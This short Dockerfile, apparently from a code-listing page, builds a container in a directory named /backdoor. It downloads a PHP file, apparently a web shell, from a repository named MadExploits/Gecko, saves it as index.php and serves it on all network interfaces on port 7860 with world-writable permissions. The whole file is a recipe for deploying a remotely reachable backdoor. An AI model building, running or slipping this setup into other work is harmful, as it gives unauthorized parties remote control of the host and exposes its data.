FROM php:latest | |
WORKDIR /backdoor | |
RUN apt update | |
RUN apt install wget -y | |
RUN wget https://github.com/MadExploits/Gecko/raw/refs/heads/main/gecko-new.php -O index.php | |
RUN echo php -S 0.0.0.0:7860 > file.sh | |
RUN chmod +777 $(pwd) | |
RUN chmod +777 file.sh | |
CMD "./file.sh" |